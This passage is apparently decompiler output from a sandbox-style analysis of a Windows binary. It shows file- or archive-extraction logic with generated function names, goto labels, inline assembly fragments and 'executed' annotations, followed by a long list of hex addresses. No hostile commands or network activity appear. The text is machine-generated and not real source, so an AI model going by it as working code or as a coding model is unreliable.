																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
																	 *(_t706 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t127 = _t706 - 0x13c; // 0x6c4
																	E00CAC634(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		L73:
																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																		_t146 = _t706 - 0x13c; // 0x6c4
																		L00CAE724(_t146);
																		_t147 = _t706 - 0x2160; // -6496
																		E00CA943C(_t147);
																		_t418 =  *(_t574 + 0x3380);
																		 *(_t706 - 4) = 1;
																		 *(_t706 - 0x24) = _t418;
																		_t670 = 0x50;
																		__eflags = _t418;
																		if(_t418 == 0) {
																			L83:
																			_t419 = E00CA2005(_t574);
																			__eflags = _t419;
																			if(_t419 == 0) {
																				_t601 =  *(_t706 + 0xf);
																				__eflags = _t601;
																				if(_t601 == 0) {
																					_t696 =  *(_t706 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t574 + 0x6cb4));
																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
																						__eflags = _t601;
																						if(_t601 == 0) {
																							L212:
																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																							_t358 = _t706 - 0x2160; // -6496
																							E00CA946E(_t358);
																							__eflags =  *(_t706 - 0x10);
																							_t385 =  *(_t706 + 0xf);
																							_t671 =  *(_t706 + 0xb);
																							if( *(_t706 - 0x10) != 0) {
																								_t362 = _t683 + 0xec;
																								 *_t362 =  *(_t683 + 0xec) + 1;
																								__eflags =  *_t362;
																							}
																							L214:
																							__eflags =  *((char*)(_t683 + 0x60));
																							if( *((char*)(_t683 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t385;
																							if(_t385 != 0) {
																								L15:
																								_t393 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
																								__eflags = _t671;
																								if(_t671 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E00CA1E3B(_t574);
																							goto L15;
																						}
																						L101:
																						_t422 =  *(_t683 + 8);
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) == 0) {
																							L103:
																							_t423 =  *(_t706 + 0xb);
																							__eflags = _t423;
																							if(_t423 != 0) {
																								L108:
																								 *((char*)(_t706 - 0xf)) = 1;
																								__eflags = _t423;
																								if(_t423 != 0) {
																									L110:
																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
																									E00CAA728(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									E00CAA728(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									_t698 = _t683 + 0x10;
																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
																									_t217 = _t706 - 0x2160; // -6496
																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
																									E00CAC67C(_t698, _t574, _t217);
																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
																									_t608 = 0;
																									_t432 =  *(_t706 + 0xb);
																									 *((char*)(_t683 + 0x39)) = _t672;
																									 *((char*)(_t683 + 0x3a)) = _t432;
																									 *(_t706 - 0x1c) = 0;
																									 *(_t706 - 0x28) = 0;
																									__eflags = _t672;
																									if(_t672 != 0) {
																										L127:
																										_t673 =  *(_t683 + 8);
																										__eflags =  *((char*)(_t673 + 0x6198));
																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
																										__eflags =  *((char*)(_t706 - 0xf));
																										if( *((char*)(_t706 - 0xf)) != 0) {
																											L131:
																											_t434 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t706 - 0x24);
																											 *((char*)(_t706 - 0xe)) = _t608;
																											 *((char*)(_t706 - 0x12)) = _t434;
																											 *((char*)(_t706 - 0xd)) = _t434;
																											if( *(_t706 - 0x24) == 0) {
																												__eflags =  *(_t574 + 0x3318);
																												if( *(_t574 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t574 + 0x22a0));
																													if(__eflags != 0) {
																														E00CB2842(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
																														__eflags = 0;
																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
																														 *((char*)(_t472 + 0x4c60)) = 0;
																														E00CB24D9( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff); // executed
																													} else {
																														_push( *(_t574 + 0x32e4));
																														_push( *(_t574 + 0x32e0));
																														_push(_t698);
																														E00CA910B(_t574, _t673, _t683, __eflags);
																													}
																												}
																												L163:
																												E00CA1E3B(_t574);
																												__eflags =  *((char*)(_t574 + 0x3319));
																												if( *((char*)(_t574 + 0x3319)) != 0) {
																													L166:
																													_t436 = 0;
																													__eflags = 0;
																													_t610 = 0;
																													L167:
																													__eflags =  *(_t574 + 0x3370);
																													if( *(_t574 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t574 + 0x22a0));
																														if( *((char*)(_t574 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t706 + 0xb);
																															 *((char*)(_t706 - 0xe)) = _t436;
																															if( *(_t706 + 0xb) != 0) {
																																L185:
																																__eflags =  *(_t706 - 0x24);
																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
																																if( *(_t706 - 0x24) == 0) {
																																	L189:
																																	_t611 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t706 - 0xf));
																																	if( *((char*)(_t706 - 0xf)) != 0) {
																																		goto L212;
																																	}
																																	_t699 =  *(_t706 - 0x18);
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t706 - 0x24);
																																		if( *(_t706 - 0x24) == 0) {
																																			L197:
																																			__eflags = _t436;
																																			if(_t436 == 0) {
																																				L200:
																																				__eflags = _t611;
																																				if(_t611 != 0) {
																																					L208:
																																					_t437 =  *(_t683 + 8);
																																					__eflags =  *((char*)(_t437 + 0x61a0));
																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
																																						_t700 = _t683 + 0x10f6;
																																						_t438 = E00CAA12F(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
																																						__eflags = _t438;
																																						if(__eflags == 0) {
																																							E00CA6BF5(__eflags, 0x11, _t574 + 0x1e, _t700);
																																						}
																																					}
																																					 *(_t683 + 0x10f5) = 1;
																																					goto L212;
																																				}
																																				_t675 =  *(_t706 - 0x28);
																																				__eflags = _t675;
																																				_t613 =  *(_t706 - 0x1c);
																																				if(_t675 > 0) {
																																					L203:
																																					__eflags = _t436;
																																					if(_t436 != 0) {
																																						L206:
																																						_t331 = _t706 - 0x2160; // -6496
																																						E00CA9BD6(_t331);
																																						L207:
																																						_t688 = _t574 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t339 = _t706 - 0x2160; // -6496
																																						E00CA9A7E(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t340 = _t706 - 0x2160; // -6496
																																						E00CA94DA(_t340);
																																						E00CA7A12( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
																																						E00CA9A7B( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t683 =  *((intOrPtr*)(_t706 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x88)) - _t613;
																																					if( *((intOrPtr*)(_t683 + 0x88)) != _t613) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x8c)) - _t675;
																																					if( *((intOrPtr*)(_t683 + 0x8c)) == _t675) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t613;
																																				if(_t613 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t460 =  *(_t683 + 8);
																																			__eflags =  *((char*)(_t460 + 0x6198));
																																			if( *((char*)(_t460 + 0x6198)) == 0) {
																																				goto L212;
																																			}
																																			_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																			goto L200;
																																		}
																																		__eflags = _t611;
																																		if(_t611 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t574 + 0x3380) - 5;
																																		if( *(_t574 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t674;
																																		if(_t674 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x34));
																																	if(_t699 !=  *((intOrPtr*)(_t706 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t574 + 0x3380) - 4;
																																if( *(_t574 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t674;
																																if(_t674 == 0) {
																																	goto L189;
																																}
																																_t611 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t706 - 0x12));
																															if( *((char*)(_t706 - 0x12)) == 0) {
																																goto L185;
																															}
																															__eflags = _t610;
																															if(_t610 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x331b)) - _t610;
																															if(__eflags == 0) {
																																L183:
																																_t311 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(3);
																																L184:
																																E00CA6BF5(__eflags);
																																 *((char*)(_t706 - 0xe)) = 1;
																																E00CA6E03(0xce00e0, 3);
																																_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x3341)) - _t610;
																															if( *((intOrPtr*)(_t574 + 0x3341)) == _t610) {
																																L181:
																																__eflags =  *((char*)(_t683 + 0xf3));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t309 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t574 + 0x6cc4) - _t610;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t574 + 0x32e4) - _t436;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t610;
																															if(_t610 != 0) {
																																 *((char*)(_t683 + 0xf3)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t574 + 0x32e0) - _t436;
																														if( *(_t574 + 0x32e0) <= _t436) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t683 + 0xf3)) = _t436;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t469 = E00CAA6F6(_t683 + 0xc8, _t683, _t574 + 0x32f0,  ~( *(_t574 + 0x334a) & 0x000000ff) & _t574 + 0x0000334b);
																												__eflags = _t469;
																												if(_t469 == 0) {
																													goto L166;
																												}
																												_t610 = 1;
																												_t436 = 0;
																												goto L167;
																											}
																											_t702 =  *(_t574 + 0x3380);
																											__eflags = _t702 - 4;
																											if(__eflags == 0) {
																												L146:
																												_t262 = _t706 - 0x41a8; // -14760
																												E00CA80B1(_t683, __eflags, _t574, _t574 + 0x3384, _t262, 0x800);
																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
																												__eflags = _t608;
																												if(_t608 == 0) {
																													L153:
																													_t479 =  *((intOrPtr*)(_t706 - 0xd));
																													L154:
																													__eflags =  *((intOrPtr*)(_t574 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t574 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t608;
																														if(_t608 == 0) {
																															L157:
																															_t480 = 0;
																															__eflags = 0;
																															L158:
																															 *(_t683 + 0x10f5) = _t480;
																															goto L163;
																														}
																														L142:
																														__eflags = _t479;
																														if(_t479 == 0) {
																															goto L157;
																														}
																														_t480 = 1;
																														goto L158;
																													}
																													__eflags = _t608;
																													if(_t608 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t706 - 0x12)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t706 - 0x41a8));
																												if( *((short*)(_t706 - 0x41a8)) == 0) {
																													goto L153;
																												}
																												_t266 = _t706 - 0x41a8; // -14760
																												_push(0x800);
																												_push(_t683 + 0x10f6);
																												__eflags = _t702 - 4;
																												if(__eflags != 0) {
																													_push(_t574 + 0x1e);
																													_t269 = _t706 - 0x2160; // -6496
																													_t479 = E00CA9049(_t673, __eflags);
																												} else {
																													_t479 = E00CA74DD(_t608, __eflags);
																												}
																												L151:
																												 *((char*)(_t706 - 0xd)) = _t479;
																												__eflags = _t479;
																												if(_t479 == 0) {
																													L139:
																													_t608 =  *((intOrPtr*)(_t706 - 0xe));
																													goto L140;
																												}
																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
																												goto L154;
																											}
																											__eflags = _t702 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t702 - _t434;
																											if(_t702 == _t434) {
																												L144:
																												__eflags = _t608;
																												if(_t608 == 0) {
																													goto L153;
																												}
																												_push(_t683 + 0x10f6);
																												_t479 = E00CA774C(_t673, _t683 + 0x10, _t574);
																												goto L151;
																											}
																											__eflags = _t702 - 2;
																											if(_t702 == 2) {
																												goto L144;
																											}
																											__eflags = _t702 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E00CA6BF5(__eflags, 0x47, _t574 + 0x1e, _t683 + 0x10f6);
																											__eflags = 0;
																											_t479 = 0;
																											 *((char*)(_t706 - 0xd)) = 0;
																											goto L139;
																										}
																										__eflags = _t432;
																										if(_t432 != 0) {
																											goto L131;
																										}
																										_t491 = 0x50;
																										__eflags =  *(_t706 - 0x18) - _t491;
																										if( *(_t706 - 0x18) == _t491) {
																											goto L131;
																										}
																										_t434 = 1;
																										_t608 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t574 + 0x6cc4);
																									if( *(_t574 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t703 =  *(_t574 + 0x32e4);
																									_t681 =  *(_t574 + 0x32e0);
																									__eflags = _t703;
																									if(__eflags < 0) {
																										L126:
																										_t698 = _t683 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t631 =  *(_t574 + 0x32d8);
																										_t632 = _t631 << 0xa;
																										__eflags = ( *(_t574 + 0x32dc) << 0x00000020 | _t631) << 0xa - _t703;
																										if(__eflags < 0) {
																											L125:
																											_t432 =  *(_t706 + 0xb);
																											_t608 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t703;
																											if(__eflags < 0) {
																												L124:
																												_t237 = _t706 - 0x2160; // -6496
																												E00CA98D5(_t237,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
																												 *(_t706 - 0x1c) =  *(_t574 + 0x32e0);
																												 *(_t706 - 0x28) =  *(_t574 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t499 = E00CA96E1(_t681);
																												__eflags = _t681 -  *(_t574 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t499 -  *(_t574 + 0x32d8);
																												if(_t499 <=  *(_t574 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t681 - 0x5f5e100;
																											if(_t681 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t632 - _t681;
																										if(_t632 <= _t681) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t681 - 0xf4240;
																									if(_t681 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t198 = _t683 + 0xe4;
																								 *_t198 =  *(_t683 + 0xe4) + 1;
																								__eflags =  *_t198;
																								goto L110;
																							}
																							 *((char*)(_t706 - 0xf)) = 0;
																							_t501 = 0x50;
																							__eflags = _t696 - _t501;
																							if(_t696 != _t501) {
																								_t192 = _t706 - 0x2160; // -6496
																								__eflags = E00CA9745(_t192);
																								if(__eflags != 0) {
																									E00CA6BF5(__eflags, 0x3b, _t574 + 0x1e, _t683 + 0x10f6);
																									E00CA6E9B(0xce00e0, _t706, _t574 + 0x1e, _t683 + 0x10f6);
																								}
																							}
																							goto L109;
																						}
																						 *(_t683 + 0x10f5) = 1;
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) != 0) {
																							_t423 =  *(_t706 + 0xb);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t706 + 0xb) = 1;
																					 *(_t706 + 0xf) = 1;
																					_t182 = _t706 - 0x113c; // -2364
																					_t511 = E00CB0FD9(_t601, _t182, 0, 0, 1);
																					__eflags = _t511;
																					if(_t511 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t706 - 0x1c) = 0;
																					L99:
																					_t184 = _t706 - 0x2160; // -6496
																					E00CA946E(_t184);
																					_t393 =  *(_t706 - 0x1c);
																					goto L16;
																				}
																				_t174 = _t706 - 0x2160; // -6496
																				_push(_t574);
																				_t515 = E00CA7F5F(_t683);
																				_t696 =  *(_t706 - 0x18);
																				_t601 = _t515;
																				 *(_t706 + 0xf) = _t601;
																				L93:
																				__eflags = _t601;
																				if(_t601 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t706 + 0xf);
																			if( *(_t706 + 0xf) != 0) {
																				_t516 =  *(_t706 - 0x18);
																				__eflags = _t516 - 0x50;
																				if(_t516 != 0x50) {
																					_t639 = 0x49;
																					__eflags = _t516 - _t639;
																					if(_t516 != _t639) {
																						_t640 = 0x45;
																						__eflags = _t516 - _t640;
																						if(_t516 != _t640) {
																							_t517 =  *(_t683 + 8);
																							__eflags =  *((intOrPtr*)(_t517 + 0x6158)) - 1;
																							if( *((intOrPtr*)(_t517 + 0x6158)) != 1) {
																								 *(_t683 + 0xe4) =  *(_t683 + 0xe4) + 1;
																								_t172 = _t706 - 0x113c; // -2364
																								_push(_t574);
																								E00CA7D9B(_t683);
																							}
																						}
																					}
																				}
																			}
																			goto L99;
																		}
																		__eflags = _t418 - 5;
																		if(_t418 == 5) {
																			goto L83;
																		}
																		_t601 =  *(_t706 + 0xf);
																		_t696 =  *(_t706 - 0x18);
																		__eflags = _t601;
																		if(_t601 == 0) {
																			goto L96;
																		}
																		__eflags = _t696 - _t670;
																		if(_t696 == _t670) {
																			goto L93;
																		}
																		_t520 =  *(_t683 + 8);
																		__eflags =  *((char*)(_t520 + 0x61f9));
																		if( *((char*)(_t520 + 0x61f9)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t706 - 0xf)) = 0;
																		_t523 = E00CA9E6B(_t683 + 0x10f6);
																		__eflags = _t523;
																		if(_t523 == 0) {
																			L81:
																			__eflags =  *((char*)(_t706 - 0xf));
																			if( *((char*)(_t706 - 0xf)) == 0) {
																				_t601 =  *(_t706 + 0xf);
																				goto L93;
																			}
																			L82:
																			_t601 = 0;
																			 *(_t706 + 0xf) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t706 - 0xf));
																		if( *((char*)(_t706 - 0xf)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t574 + 0x32c0);
																		_t160 = _t706 - 0xf; // 0x7f1
																		E00CA919C(0,  *(_t683 + 8), 0, _t683 + 0x10f6, 0x800, _t160,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t574 + 0x3341));
																	if( *((char*)(_t574 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t132 = _t706 - 0x2c; // 0x7d4
																	_t531 = E00CBF3CA(_t574 + 0x3342, _t132, 8);
																	_t708 = _t710 + 0xc;
																	__eflags = _t531;
																	if(_t531 == 0) {
																		goto L73;
																	}
																	__eflags =  *(_t574 + 0x6cc4);
																	if( *(_t574 + 0x6cc4) != 0) {
																		goto L73;
																	}
																	__eflags =  *((char*)(_t683 + 0x10f4));
																	_t136 = _t706 - 0x113c; // -2364
																	_push(_t574 + 0x1e);
																	if(__eflags != 0) {
																		_push(6);
																		E00CA6BF5(__eflags);
																		E00CA6E03(0xce00e0, 0xb);
																		__eflags = 0;
																		 *(_t706 + 0xf) = 0;
																		goto L73;
																	}
																	_push(0x7d);
																	E00CA6BF5(__eflags);
																	E00CAE797( *(_t683 + 8) + 0x5024);
																	 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																	_t141 = _t706 - 0x13c; // 0x6c4
																	L00CAE724(_t141);
																}
															}
															E00CA6E03(0xce00e0, 2);
															_t543 = E00CA1E3B(_t574);
															__eflags =  *((char*)(_t574 + 0x6cb4));
															_t393 = _t543 & 0xffffff00 |  *((char*)(_t574 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t100 = _t706 - 0x2198; // -6552
														_t545 = E00CA7BBB(_t100, _t574 + 0x32c0);
														__eflags = _t545;
														if(_t545 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t706 - 0x219c));
														if( *((char*)(_t706 - 0x219c)) == 0) {
															L59:
															 *(_t706 + 0xf) = 0;
															goto L61;
														}
														_t102 = _t706 - 0x2198; // -6552
														_t547 = E00CA7B9D(_t102, _t683);
														__eflags = _t547;
														if(_t547 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t692 - _t668;
													if(_t692 != _t668) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t398 + 0x6154));
												if( *((char*)(_t398 + 0x6154)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t683 + 0x10f6);
											if( *(_t683 + 0x10f6) == 0) {
												goto L50;
											}
											 *(_t706 + 0xf) = 1;
											__eflags =  *(_t574 + 0x3318);
											if( *(_t574 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t692 - _t387;
										_t388 = 1;
										if(_t692 != _t387) {
											goto L46;
										}
										goto L45;
									}
									_t671 =  *((intOrPtr*)(_t574 + 0x6cb4));
									 *(_t706 + 0xb) = _t671;
									 *(_t706 + 0xc) = _t671;
									__eflags = _t671;
									if(_t671 == 0) {
										goto L214;
									} else {
										_t667 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t683 + 0xec) -  *((intOrPtr*)(_t577 + 0xa32c));
								if( *(_t683 + 0xec) <  *((intOrPtr*)(_t577 + 0xa32c))) {
									goto L29;
								}
								__eflags =  *((char*)(_t683 + 0xf1));
								if( *((char*)(_t683 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t574 + 0x32e0) = _t665;
								 *(_t574 + 0x32e4) = _t665;
								goto L26;
							}
							__eflags =  *(_t574 + 0x32e0) - _t665;
							if( *(_t574 + 0x32e0) >= _t665) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t574 + 0x32d8) = _t665;
							 *(_t574 + 0x32dc) = _t665;
							goto L22;
						}
						__eflags =  *(_t574 + 0x32d8) - _t665;
						if( *(_t574 + 0x32d8) >= _t665) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t690 - 3;
					if(_t690 != 3) {
						L10:
						__eflags = _t690 - 5;
						if(_t690 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t574 + 0x45ac));
						if( *((char*)(_t574 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t706 - 0x18));
						_push(0);
						_push(_t683 + 0x10);
						_push(_t574);
						_t564 = E00CB80D0(_t665);
						__eflags = _t564;
						if(_t564 != 0) {
							__eflags = 0;
							 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca0)),  *((intOrPtr*)(_t574 + 0x6ca4)), 0);
							goto L15;
						} else {
							E00CA6E03(0xce00e0, 1);
							goto L219;
						}
					}
					__eflags =  *(_t683 + 0x10f5);
					if( *(_t683 + 0x10f5) == 0) {
						goto L217;
					} else {
						E00CA79A7(_t574, _t706,  *(_t683 + 8), _t574, _t683 + 0x10f6);
						goto L10;
					}
				}
				if( *((intOrPtr*)(_t683 + 0x5f)) == 0) {
					L4:
					_t393 = 0;
					goto L17;
				}
				_push(_t370);
				_push(0);
				_push(_t683 + 0x10);
				_push(_t574);
				if(E00CB80D0(0) != 0) {
					_t665 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E00CA6E03(0xce00e0, 1);
					goto L4;
				}
			}
























































































                0x00ca83c0
                0x00ca83c5
                0x00ca83cf
                0x00ca83d5
                0x00ca83d8
                0x00ca83db
                0x00ca83dd
                0x00ca83e3
                0x00ca83ea
                0x00ca83f0
                0x00ca841c
                0x00ca841d
                0x00ca8423
                0x00ca8426
                0x00ca84b5
                0x00ca84bb
                0x00ca84c1
                0x00ca84d9
                0x00ca84d9
                0x00ca84df
                0x00ca84f7
                0x00ca84f7
                0x00ca84fa
                0x00ca8500
                0x00ca851d
                0x00ca8522
                0x00ca8526
                0x00ca8530
                0x00ca853b
                0x00ca8540
                0x00ca8542
                0x00ca8545
                0x00ca8548
                0x00ca854a
                0x00ca854c
                0x00ca8550
                0x00ca8552
                0x00ca8554
                0x00ca8554
                0x00ca8550
                0x00ca855c
                0x00ca8561
                0x00ca8562
                0x00ca856f
                0x00ca8570
                0x00ca8578
                0x00ca857f
                0x00ca8582
                0x00ca85d9
                0x00ca85de
                0x00ca85e0
                0x00ca85e2
                0x00ca85e8
                0x00ca85ee
                0x00ca85f2
                0x00ca85f2
                0x00ca85f2
                0x00ca85f2
                0x00ca8584
                0x00ca8587
                0x00ca858d
                0x00ca858f
                0x00ca8591
                0x00ca8595
                0x00ca8597
                0x00ca859e
                0x00ca85a3
                0x00ca85a4
                0x00ca85ab
                0x00ca85b0
                0x00ca85ba
                0x00ca85bc
                0x00ca85d2
                0x00ca85be
                0x00ca85c0
                0x00ca85c7
                0x00ca85c9
                0x00ca85c9
                0x00ca85bc
                0x00ca8595
                0x00ca858f
                0x00ca85fb
                0x00ca8600
                0x00ca8618
                0x00ca8622
                0x00ca8625
                0x00ca8627
                0x00ca862b
                0x00ca862e
                0x00ca8631
                0x00ca8634
                0x00ca864c
                0x00ca864f
                0x00ca8654
                0x00ca865a
                0x00ca865b
                0x00ca865d
                0x00ca8666
                0x00ca8666
                0x00ca8668
                0x00ca866b
                0x00ca8675
                0x00ca867c
                0x00ca8681
                0x00ca8683
                0x00ca9042
                0x00ca9042
                0x00ca84a2
                0x00ca84a3
                0x00ca84a8
                0x00ca84b2
                0x00ca84b2
                0x00ca8697
                0x00ca869a
                0x00ca86a2
                0x00ca86a9
                0x00ca86ac
                0x00ca86c3
                0x00ca86c3
                0x00ca86c6
                0x00ca86c6
                0x00ca86cb
                0x00ca86ce
                0x00ca86d5
                0x00ca86d6
                0x00ca86d9
                0x00ca86dc
                0x00ca86e7
                0x00ca86e7
                0x00ca86ea
                0x00ca86f1
                0x00ca86f1
                0x00ca86f7
                0x00ca86fe
                0x00ca86ff
                0x00ca870d
                0x00ca8712
                0x00ca8714
                0x00ca874c
                0x00ca874f
                0x00ca875b
                0x00ca875b
                0x00ca875b
                0x00ca875e
                0x00ca875e
                0x00ca8768
                0x00ca876d
                0x00ca876f
                0x00ca8793
                0x00ca8793
                0x00ca879a
                0x00000000
                0x00000000
                0x00ca879c
                0x00ca87a6
                0x00ca87ab
                0x00ca87ad
                0x00ca888c
                0x00000000
                0x00ca888c
                0x00ca87b3
                0x00ca87b6
                0x00ca87c4
                0x00ca87c5
                0x00ca87c5
                0x00ca87c7
                0x00ca87d0
                0x00ca87d3
                0x00ca87df
                0x00ca87f2
                0x00ca87fc
                0x00ca880e
                0x00ca8813
                0x00ca881a
                0x00ca88b0
                0x00ca88b0
                0x00ca88b4
                0x00ca88ba
